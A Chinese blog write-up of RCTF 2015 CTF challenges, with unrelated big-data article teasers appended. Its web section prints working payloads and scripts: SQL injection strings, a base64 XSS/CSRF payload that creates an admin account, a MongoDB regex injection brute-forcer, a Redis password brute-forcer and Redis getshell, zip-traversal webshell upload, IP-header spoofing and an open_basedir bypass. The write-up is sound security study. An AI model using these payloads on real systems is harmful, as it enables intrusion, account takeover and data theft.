Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >RCTF2015_writeup

RCTF2015_writeup

作者头像
LoRexxar
发布于 2023-02-20 06:58:39
发布于 2023-02-20 06:58:39
39100
代码可运行
举报
文章被收录于专栏:LoRexxar's BlogLoRexxar's Blog
运行总次数:0
代码可运行

这次的rctf貌似是第一次举办,而且还是所属xctf,所以出现了好多大牛队伍,题目脑洞大还要强行增加难度(估计出题人已经把能想到的问题全部扔上去了),也不知道是受了什么的刺激,不管怎么样,还是从一大堆注入题目中学习了不少没见过的注入姿势,留下writeup…

WEB

WEB 100 upload (文件名 insert injection)

打开页面是这样的,稍微试试,发现并不是upload,上传成功之后会发现会显示上传的文件名,所以想到应该是insert injection,过滤了and, select, union, from, sleep, benchmark, substring这样的,但是可以通过scrscriptipt这样的方式绕过。 开始尝试的很多方式都没有回显,所以放弃了,后来看到writeup才明白,表中的结构大概是 ‘文件名’,’uid’,’uid’ 而uid返回的都是数字,所以如果没有在对应的位置的话的确不会出现回显,当然如果强行返回数字,也是可以,但是有个验证码存在,所以需要很长很长时间才能得到flag,不过得到正确的表结构就很简单了。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
文件名','uid','uid'),((database()),'uid','uid')

按照这样的方式下去,慢慢就能get flag

WEB 150 weeeeeb3 (修改密码逻辑漏洞 ip伪造 上传绕过)

题目是这样的,稍微翻翻发现在修改密码的地方存在两部,第一步判断成功后进入第二步修改密码

在这里可以抓包并修改admin的密码,开始还以为无效,后来发现是登陆的人太多了,所以必须跑脚本才能成功。

登陆上去后,点message提示ip不对,于是去修改xff(X-Forward-For)和ci(Cilet ip),登陆后提示 <!– index.php?module=filemanage&do=???–> 这里一通乱试发现upload成功了,出现了一个上传页面,这里居然还没有结束,好烦只能继续… 随便上传试试,发现什么都没有提示 You know what I want! 既然这样就是是php 提示Something shows it is a php! 后来试了试怎么都过不了<?所以放弃了,看writeup学到个黑科技 phpinfo() (这都可以。。。)get flag

WEB 150 easysql (显错注入 花式bypass)

题目登陆后是这样的

发现注册时候加入“后,修改密码报错 一下子了然了,是显错注入,过滤rand @ ` 空格 order /*/ /! */ %20 %09 %0a %0b %0c %0d 也就是传统的显错方式不可以,还过滤了各式各样的空格,所以limit也不能使用,这里先给出payload,后面再另写文章关于显错注入。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
username=ddog"||updatexml(0x7c,concat((select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^R'))),1)#&password=123&email=123

WEB 300 xss (link 标签黑科技)

过滤了炒鸡多标签,这次还过滤了大小写和url编码,所以就要找写没有被过滤的特殊标签了,开始想到的是svg,但是basa64编码过的总是出现on被过滤,而且只存在在firefox,而题目要求chrome所以有点儿雪崩,后来看了writeup,知道了link这个黑科技。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<link rel="import" href="data:text/html;base64,PHNjcmlwdD5kZWxldGUgYWxlcnQ7YWxlcnQoIkhlbGxvIik7PC9zY3JpcHQ+">

这样就可以弹窗了,翻翻源码,发现是要把消息发给admin,然后以amdin账号注册账号,典型的csrf。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<!--only for admin
<form action="" method="post">
username:<input type="text" name="name"><br />
password:<input type="password" name="pass"><br />
<input type="radio" name="isadmin" value="0">user
<input type="radio" name="isadmin" value="1">admin<br />
<input type="hidden" name="token" value="34a1615ff3eaf616f7fa205a12792d27">
<input type="submit" name="adduser" value="adduser">
</form>-->

在writeup中是直接通过jq写个post请求添加

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<script src=http://180.76.178.54:8004/4b79f5d4860384d4ac494ad91f5313b7/js/jquery.js></script>
<script>
$.ajax({
type: "post",
url: "",
data: "name=tomato123&pass=tomato123&isadmin=1&adduser=adduser&token="+$("input[name=token]").val()})
</script>

然后构造payload

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<link rel="import" href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzE4MC43Ni4xNzguNTQ6ODAwNC80Yjc5ZjVkNDg2MDM4NGQ0YWM0OTRhZDkxZjUzMTNiNy9qcy9qcXVlcnkuanM+PC9zY3JpcHQ+CjxzY3JpcHQ+CiQuYWpheCh7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0eXBlOiAicG9zdCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1cmw6ICIiLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGF0YTogIm5hbWU9dG9tYXRvMTIzJnBhc3M9dG9tYXRvMTIzJmlzYWRtaW49MSZhZGR1c2VyPWFkZHVzZXImdG9rZW49IiskKCJpbnB1dFtuYW1lPXRva2VuXSIpLnZhbCgpfSkKPC9zY3JpcHQ+">

找到admin.php,然后登陆得到flag

WEB 300 login (mongodb注入加不拉不拉一堆坑)

这里直接卡在第一步,虽然听过这样的注入,但是还是没研究过,先贴上关于mongodb注入的资料 http://drops.wooyun.org/tips/3939 跑出账号的脚本长这样(看不懂,先留着)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php 

ini_set("max_execution_time", 100);

echo 'start<br />';
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,'http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/checkLogin.php');
curl_setopt ($ch, CURLOPT_HTTPHEADER , array("X-Requested-With: XMLHttpRequest"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_POST,1);

$ori = '0123456789abcdefghijklmnopqrstuvwxyzQWERTYUIOPASDFGHJKLZXCVBNM_';
$str = '';
for ($i=0; $i <40 ; $i++) {
	if($i > (strlen($str)+1) )
		break;
    for ($j=0; $j <strlen($ori) ; $j++) { 
        $post = 'username[$regex]=/^'.$str.$ori[$j].'.*/&password[$ne]=admin';
        curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
        $data=curl_exec($ch);
        if (strlen($data) == 104) {
           $str.=$ori[$j];
           break;
        }
    }
}
$username = $str;
$str = '';
for ($i=0; $i <40 ; $i++) {
	if($i > (strlen($str)+1) )
		break;
    for ($j=0; $j <strlen($ori) ; $j++) { 
        $post = 'username='.$username.'&password[$regex]=/^'.$str.$ori[$j].'.*/';

        curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
        $data=curl_exec($ch);
        if (strlen($data) == 104) {
           $str.=$ori[$j];
           break;
        }
    }
}
$password = $str;
echo 'username='.$username."<br />";
echo 'password='.$password."<br />";
echo 'end!';
?>

得到账号密码ROIS_ADMIN pas5woRd_i5_45e2884c4e5b9df49c747e1d 登陆后是这样的

下载备份文件,发现是一个php的解压zip的类,然后百度找到官方提供的,在diff一下 源码里发现

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$Agent = $_SERVER['HTTP_USER_AGENT'];
$backDoor = $_COOKIE['backdoor'];
$msg = json_encode("no privilege");
$iterations = 1000;
$salt = "roisctf";
$alg = "sha1";
$keylen = "20";
if ($Agent == $backDoor || strlen($Agent) != 65) {
    exit($msg);
}
if (substr($Agent,0,23) != "rois_special_user_agent") {
    exit($msg);
}
if (pbkdf2($alg, $Agent, $salt, $iterations, $keylen) != pbkdf2($alg, $backDoor, $salt, $iterations, $keylen)) {
    exit($msg);
}

测试发现直接上传zip提示没有权限,然后只有过了上面三个条件才行。主要是第三个条件不好过,然后google一发 pdkdf2 ctf

找到了这个 PBKDF2+HMAC collision 然后在https://mathiasbynens.be/notes/pbkdf2-hmac 这篇文章里面说到这个是可以碰撞的,就是不同的明文会出现相同的密文,然后用里面提供的脚本跑一发。成功跑出来一个

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
rois_special_user_agentaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaamipvkd
3-Rfm^Bq;ZZAcl]mS&eE

然后改一下ua,在cookie里面添加backdoor就可以成功上传了

按照解压出来的文件的命名规则为md5(文件名+RoisFighting).文件的后缀 但是访问http://180.76.178.54:8005/53a0fb1b692f02436c3b5dda1db9c361/upload/image/051ee28a1964f9f2779d32f2e48212cb/70d08f9380da3a6e0440b3266a2a39f6.php 文件并不存在,测试发现在解压后会直接删除文件,所以我们可以尝试构造一个解压到上级目录的shell

shell地址就是 http://180.76.178.54:8005/ 53a0fb1b692f02436c3b5dda1db9c361/upload/image/382aef24b11f8c5222bc58062a9bf5c7.php

后面的反正是看不懂,就都扔上去了

WEB 500 糊上来官方的writeup

1.通过目录猜解1.sql数据备份文件可以知道,admin用户的密码就是admin,username字段长度16,password字段长度32。 通过测试,可以利用长字符截断admin 1(长度大于16),admin 1(长度大于32),绕过admin不能登录的限制。

2.登录后台,是admin的信息,查看源码,根据提示,即通过社工。即要破解某个服务的密码。nmap扫描,得到redis服务的端口。即要爆破redis的密码。

3.写脚本,爆破redis密码,由上面admin的信息内容,通过查找社工库得到gmail的密码是rkr4me,但这不是他真正的密码。结合其他信息,根据关键字写个脚本生成字典。 生成字典脚本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#!/usr/bin/env python

import itertools

fp = open('social.txt','w')
keyword = ['JiaoXiaoMing', 'jiaoxiaoming', 'jxm', 'Jxm', 'JXM', '19960708', '960708', '0708', 'rkr4me']
for i in range(1,9):
    for e in itertools.permutations(keyword, i):
        st = ''.join(e)
        fp.write(st+'\n')
fp.close()

爆破密码脚本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#!/usr/bin/env python

import redis

fo = open('social.txt', 'r')
for line in fo.readlines():
    line = line.strip('\n').strip()
    r = redis.Redis(host='180.76.178.50', port=6379, db=0, password=line) 
    try:
        r.info()
    except Exception,e:
        #print e
        continue
    else:
        print line
	break

最后爆破出来的密码是Jxm0960708rkr4me

4.连上redis,redis getshell需要网站路径。则想办法获取网站路径,网站路径报错没有回显,那就要额外的方法了。网站也没有phpinfo文件,然后通过login.php~备份文件获取到了internal.php这个路径,但是无法访问,根据内部测试系统,可能是限制ip。那通过伪造Client-ip: 127.0.0.1进入了internal.php页面,有个测试接口。

自然想到了csrf,csrf过滤了一些内容,不断调试,构造payload,得到http://a@127.0.0.1.xip.io:80此类的构造,也就是要有xxx@,xip.io:端口,这样才能绕过过滤(前面有些bug,被各路大牛更轻易绕过)。然后通过csrf扫描端口和路径,得到8080端口,payload是这样的http://abc@127.0.0.1.xip.io:8080/index.php 得到里面的部署提示,实际网站部署在he1m4n6a目录下,根据8080首页即phpinfo内容,得到网站真实路径/var/www/rois/he1m4n6a

5.Redis 设置好路径,getshell后,发现无法访问根目录。应该是openbase_dir设置的,那就上传一个文件绕过openbase_dirphp文件,列出更目录所有文件,得到根目录的一个文件名rctf{xxx},便是flag

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php $file_list = array(); 
    $it = new DirectoryIterator("glob:///*"); 
    foreach($it as $f) {
        $file_list[] = $f->__toString();
    }  
    $it = new DirectoryIterator("glob:///.*"); 
    foreach($it as $f) { 
        $file_list[] = $f->__toString();
    }
    sort($file_list);
    foreach($file_list as $f) {
        echo file_get_contents({$f}); 
        echo "{$f}<br/>";
    }
?>

6.服务器后台自动运行脚本,每隔一段时间会删除无关文件,所以你得写脚本不断上传webshell,或者webshell写入内存中,或者手速快的就好了。。

MISC

MISC 10

360出过的花键盘,没什么意思,还出了几个假flag,实话说这种手段特别无聊,还影响人

MISC 50 日志分析

蛮有意思的题目,开始已经在想是不是要东西,后来发现其实是sqlmap跑密码的日志,根据日志可以分析出flag 附上脚本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
import urllib

log = open('log_flag.log','r')
log2 = open('log_flag_urldecode2.log','w')

for eachLine in log:
        pos = eachLine.find('id=')
        result = urllib.unquote(eachLine[pos+3:])
        if result.find('!=') != -1:
                log2.write(result[result.find('!=')+2:result.find('),S')] + ',')

log.close()
log2.close()

MISC 100 (花式脑洞密文)

没记错的话打开是张图片,开始以为是有隐写,后来在网上找到了原图,对比发现毛区别都没有,只有在EXIF信息中找到 GMYDGMJTGEZTCMZQGMYDGMJTGEZTAMZRGMYTGMJTGEZTCMZRGMYTGMBTGAZTAMZRGMYDGMJTGEZTCMZRGMYTGMBTGAZTCMZQGMYDGMJTGAZTCMZRGMYTGMBTGEZTCMZRGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMBTGAZTAMZRGMYTGMBTGEZTCMZRGMYDGMJTGEZTCMZQGMYTGMJTGAZTAMZRGMYDGMJTGEZTCMZQGMYTGMBTGEZTAMZQGMYTGMBTGAZTCMZQGMYTGMJTGEZTCMZQGMYDGMBTGEZTCMZRGMYDGMJTGAZTCMZQGMYTGMBTGAZTCMZQGMYDGMJTGAZTCMZRGMYDGMBTGAZTCMZRGMYTGMBTGEZTCMZQGMYTGMBTGAZTCMZQGMYDGMBTGEZTAMZRGMYTGMBTGEZTAMZRGMYTGMJTGAZTCMZQGMYDGMJTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMJTGEZTCMZQGMYDGMBTGEZTAMZQGMYTGMJTGEZTAMZRGMYDGMJTGEZTAMZRGMYDGMJTGAZTCMZRGMYDGMBTGEZTAMZQGMYTGMBTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMJTGAZTAMZRGMYTGMJTGEZTCMZQGMYDGMJTGAZTAMZRGMYDGMJTGAZTAMZQGMYTGMJTGEZTAMZRGMYTGMBTGAZTCMZQGMYTGMJTGEZTAMZRGMYTGMJTGAZTCMZRGMYDGMJTGEZTCMZQGMYDGMJTGAZTAMZRGMYDGMJTGAZTAMZRGMYDGMBTGAZTCMZRGMYTGMJTGAZTCMZQGMYTGMBTGEZTCMZQGMYDGMJTGAZTCMZQGMYDGMBTGAZTCMZQGMYDGMJTGEZTAMZR

开始一直以为是payfair全大写字母加密,后来发现其实是base32,接出来是一对3130.再解一次hex,得到01字符串 0111001101111111000101111100100101110111111011001010001101110111011001011101010010010111100011101010100100101100011101101001000101101011101001010111011001011110001001110101101010110010010010111011100111110010010100011101100101110111011011100100101001000111101010110010100001001101 可惜280位,没办法开方,所以应该不是二维码,想到7位一组,但是因为字符集不可定,所以最后没解出来,最后等等writeup吧

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2015/11/17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【推荐】LinkedIn怎么用大数据赚钱?
作者 杨琳桦 这可能是我听过对大数据最逻辑清晰和实用的一段案例阐述了,来自 Simon Zhang,LinkedIn Business Analytics 部门资深总监。 特别介绍一下:Simon 原是国内脑肿瘤医生,但“觉得一个人真正要想有追求,还是应该做自己喜欢的事”,于是 12 年前到美国,因个人爱好是计算机,就从医生转到了计算机行业。 四年半前,Simon 曾独自一人支持公司 200 多个销售;现在,他 80 人部门支持 LinkedIn 近 5000 多员工。该部门实际上负责所有和收入有关的
小莹莹
2018/04/20
1.4K0
张溪梦:庙算者多胜-大数据发展战略
时间:2014年6月6日上午 地点:北京国际会议中心 会议:中美创新链接·大数据专题研讨会 主办:中美创新协会,北京市科协 演讲人: 张溪梦,LinkedIn商务分析高级总监 演讲题目:庙算者多胜-大数据发展战略 以下为演讲全文: 感谢大家听我做汇报,我希望把我的演讲尽量变的更简短一些。我名字叫张溪梦,在美国大约做工作做了不到十年。主要目的就是做大数据分析,我以前是脑外科医生,做分析和做医生没有本质性区别,就是通过不同的症状来诊断事物本身的基本的比如说疾病。然后采用不同的方法治愈病人,让病人身体更健康。
大数据文摘
2018/05/21
6050
LinkedIn:我们下一步要做的是数据产品矩阵化
本文根据美国LinkedIn公司的数据分析部资深总监Simon Zhang在3月7日的阿里巴巴西湖品学大数据峰会的演讲整理而成,他着重分享了LinkedIn对体内数据的搭建、产品化和矩阵化的构想。文章未经演讲者审阅。 现在的大数据的后面是个大冰川,海平面上的普通人一般能看见,海平面以下是专业人士能看见的。Linkedin内部大约有起码20种不同的数据库,就是完全不同的技术的数据库,还不包括同样一种数据库有不同的应用。但实际上我们真正的内部企业用户,包括Linkedin本身,需要的不是一个大冰川,需要的最
大数据文摘
2018/05/22
4930
【推荐】用数据创造商业价值
GrowingIO联合创始人、CEO, 前LinkedIn美国商业分析部高级总监,张溪梦应邀参加7牛D-Furure 数据时代峰会,发表主题为《用数据分析创造商业价值》的主题演讲。 数据是一种连接。它连接4个最基本的象限,时间,地点,任务,事件。我们为什么要说数据会是下一次技术革命浪潮的最重要的指针?大家来看一下,根据美国几家顶级研究机构的报告,(Gartner,IDC等等),在未来的5年,我们会有40亿人通过互联网产生各种数据,将成就一个4万亿美元的市场,将有两千五百万种软件接入,2
小莹莹
2018/04/20
9240
【推荐】用数据创造商业价值
曝光:硅谷巨头们如何玩赚大数据
今天要跟大家分享的文章来自曾小苏 Clara的《硅谷观察之大数据篇》,该作者是36氪驻硅谷首席代表,水瓶座B型血爱吃肉,传说中是个美女。在硅谷的一个月,她在 startups demo days 和各种大公司一日游中度日,她以为会逃脱国内各种会上各种“大数据”和挖掘机的梗,但万万没想到那里更甚。所以,本文发自繁华程度仅次于五道口的宇宙中心硅谷(呵呵呵呵~),与国内小伙伴分享大数据在那片土地上的真实生长状况。在上篇她着重为大家介绍了硅谷“大数据公司”的类型,下篇讲了硅谷四大不同类型的公司如何玩转大数据。
IT阅读排行榜
2018/08/14
5250
硅谷观察之大数据篇(完整版)
作者: 曾小苏 Clara 摘自:36氪 【上篇:挖掘机和“改变世界的”大数据公司们】 硅谷的这一个月,我在 startups demo days 和各种大公司一日游中度日,以为会逃脱国内各种会上各种“大数据”和挖掘机的梗,但万万没想到这里更甚。Hi~ 本文发自仅次于五道口的宇宙中心硅谷,与你分享大数据在这片土地上的真实生长状况。 什么是“改变世界”的大数据公司 近两周硅谷两场规模比较大的 demo 大会上,就有十多家自称做大数据的 startups,有做消费者行为的,有做体育分析的,有做 NGO 融资的,
大数据文摘
2018/05/23
6290
大数据如何让社交网站收入增长85%?
每一天都有数百万用户登录 LinkedIn.com。 LinkedIn 的用户背景多元,需求多样,有企业、有学生,还有专业人员,他们有的积极求职谋业,有的只是为了扩张人脉。
IT阅读排行榜
2018/08/13
5510
大数据如何让社交网站收入增长85%?
【数据科学】张溪梦:四个案例讲透数据科学与商业结果结合的原力
论坛君 9月11日—9月12日,由经管之家(人大经济论坛)主办的“2015中国数据分析师行业峰会(CDA•Summit)”在北京举行。本文是Growing.io创始人张溪梦在峰会上的演讲全文,演讲的主
陆勤_数据人网
2018/02/26
1.1K0
【数据科学】张溪梦:四个案例讲透数据科学与商业结果结合的原力
独家专访 | 揭秘LinkedIn总部数据科学战队:技术强者常有,顶级团队胜在软实力
作者 | 魏子敏,Yawei Xia 薛娅菲和Aileen对本文亦有贡献 *本文为清华数据科学研究院联合大数据文摘发起的《数据团队建设全景报告》系列专访的第一篇内容。 从某种程度上讲,目前硅谷乃至全球最火爆的职业【Data Scientist】始于LinkedIn。 2008年,LinkedIn的数据科学团队负责人DJ Patil 和Facebook的Jeff Hammerbacher分别建立了全世界前两个真正意义上的数据科学团队,并且开始用“数据科学家(data scientist)这个词来描述他们的工作
大数据文摘
2018/05/23
9600
大数据公司挖掘数据价值的49个典型案例
本文力图从企业运营和管理的角度,梳理出发掘大数据价值的一般规律: 以数据驱动的决策,主要通过提高预测概率,来提高决策成功率; 以数据驱动的流程,主要是形成营销闭环战略,提高销售漏斗的转化率; 以数据驱动的产品,在产品设计阶段,强调个性化;在产品运营阶段,则强调迭代式创新。 从谷歌、亚马逊、Facebook、LinkedIn,到阿里、百度、腾讯,都因其拥有大量的用户注册和运营信息,成为天然的大数据公司。而像IBM、Oracle、EMC、惠普这类大型技术公司纷纷投身大数据,通过整合大数据的信息和应用,给其他公司
机器学习AI算法工程
2018/03/09
5K1
【热点】大数据应用于企业运营-傅志华
大数据在企业运营的不同层次有着不同的作用,也对应了不同的应用方法论。本文抽象出大数据应用于企业运营的不同层次以及相应的应用方法——大数据企业运营应用金字塔模型。大数据企业运营金字塔分为7个层面,包括数
小莹莹
2018/04/20
8210
【热点】大数据应用于企业运营-傅志华
大数据应用经典案例TOP50详细剖析
1. 梅西百货的实时定价机制。根据需求和库存的情况,该公司基于SAS的系统对多达7300万种货品进行实时调价。
用户2040787
2018/05/04
3.9K5
大数据应用经典案例TOP50详细剖析
推荐收藏 | 数据产品经理的书单
4月23日对于世界文学而言是一个具有象征性意义的日子。1616年的这一天,塞万提斯、莎士比亚、印卡·加西拉索·德拉维加几位大师相继与世长辞。此外,这一天也是其他一些著名作家的出生和去世的日期,例如:莫里斯·德吕翁、哈尔多尔·K·拉克斯内斯、弗拉基米尔·纳博科夫、约瑟·普拉和曼努埃尔·梅希亚·巴列霍。
万能数据的小草
2020/04/27
2.1K1
从0到1,大数据智能供应链之路
大数据文摘作品,欢迎个人转发朋友圈,自媒体、媒体、机构转载务必申请授权,后台留言“机构名称+文章标题+转载”,申请过授权的不必再次申请,只要按约定转载即可,但文末需放置大数据文摘二维码。 素材来自:《大数据供应链》 中国人民大学出版社 【成功的诺基山】 2003年,钢铁制造建筑领军企业诺基山(Rocky Mountain) 钢铁公司迫于价格压力不得不关闭其钢管工厂。2005年,由于石油成本提高,潜在的客户、石油钻井公司纷纷涌现,公司需要重新制定策略。需不需要重开钢管工厂?如果要,什么时候重开?是马上开始生产
大数据文摘
2018/05/22
7430
解开“镣铐”看数据——GrowingIO发布首款实时商业数据分析产品(附张溪梦演讲实录)
需手动埋点、数据采集不全、核心业务数据无法保留、工程量繁重、可视化图表制作耗时漫长、业务人员无法自主按需分析、无法对用户行为进行实时深层分析,数据分析师产品常见的这七大痛点或许将成为历史。 12月8日,商业数据分析公司GrowingIO发布首款实时商业数据分析产品GrowingIO V1.0,该平台同时适用于Web页面、HTML5页面以及iOS/Android客户端的数据分析。 GrowingIO V1.0首次实现了无埋点数据采集、全面收集实时数据、一键出图、实时数据分析等功能,解开了数据的“镣铐”,大大提
CDA数据分析师
2018/02/11
1K0
解开“镣铐”看数据——GrowingIO发布首款实时商业数据分析产品(附张溪梦演讲实录)
【案例】详解BAT的互联网大数据应用有何不同?
互联网行业在大数据的积累和应用以百度、腾讯和阿里巴巴最为值得关注。百度、腾讯和阿里巴巴在大数据的应用上虽然有共同的地方,但由于各自的数据来源和商业模式的不同,其大数据应用也有不同的特色。本文将分析他们拥有的数据资产和应用,以方便大家了解大型互联网企业的大数据现状和未来策略。 百度、阿里巴巴和腾讯的数据资产 从数据类型看,腾讯数据最为全面,这与其互联网业务全面相关,其最为突出的是社交数据和游戏数据,其中:社交数据最为核心的是关系链数据、用户间的互动数据、用户产生的文字、图片和视频内容;游戏数据主要包括大型网游
小莹莹
2018/04/20
8860
【案例】详解BAT的互联网大数据应用有何不同?
大数据如何在企业中落地
经常听到很多大数据的概念和趋势,但是落地而务实的介绍相对较少。笔者根据在互联网和数据领域的实际从业经验,总结出数据价值金字塔在企业运营中的应用模型。该模型对应的是企业运营中的不同层面的数据需求,下文讲逐层介绍。 数据基础平台层,金字塔的最底层也是整个金字塔的基础层,如果基础层搭建不好,上面的应用层也很难在企业运营中发挥效果。没有数据或者没有高质量的数据,所有的分析都是误导,所有的数据挖掘都是错误的引导。 这一层的目标是把企业的所有用户(客户)数据用唯一的ID串起来,包括用户(客户)的画像(
CDA数据分析师
2018/02/08
1.1K0
大数据如何在企业中落地
快速掌握麦肯锡的分析思维
本文是《如何七周成为数据分析师》的第七篇教程,如果想要了解写作初衷,可以先行阅读七周指南。温馨提示:如果您已经熟悉分析思维,大可不必再看这篇文章,或只挑选部分。
hankleo
2020/09/16
6430
快速掌握麦肯锡的分析思维
【重量级干货】大数据攻略案例分析及结论
怎样才能用起来大数据?障碍如何解决?中国企业家研究院对10多家在大数据应用方面的领先企业进行了采访调研,更多家企业进行了书面资料调研,我们发现: ■ 当前中国企业的大数据应用可以归类为:大数据运
小莹莹
2018/04/18
6400
【重量级干货】大数据攻略案例分析及结论
话题:大数据变现的九种商业模式
在大数据成为趋势,成为国家战略的今天,如何最大限度发挥大数据的价值成为人们思考的问题。无论是对于互联网企业、电信运营商还是数量众多的初创企业而言,大数据的变现显得尤为重要。谁最先一步找到密码,谁就能够抢占市场,赢得发展。 大数据产业具有无污染、生态友好、低投入高附加值特点,对于我国转变过去资源因素型经济增长方式、推进“互联网+”行动计划、实现国家制造业30年发展目标有战略意义。前几年,国内大数据产业讨论较多、落地较少,商业模式处于初探期,行业处于两种极端:一种是过热的浮躁带来了一定的泡沫和产业风险;一
腾讯研究院
2018/01/31
2K0
推荐阅读
相关推荐
【推荐】LinkedIn怎么用大数据赚钱?
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验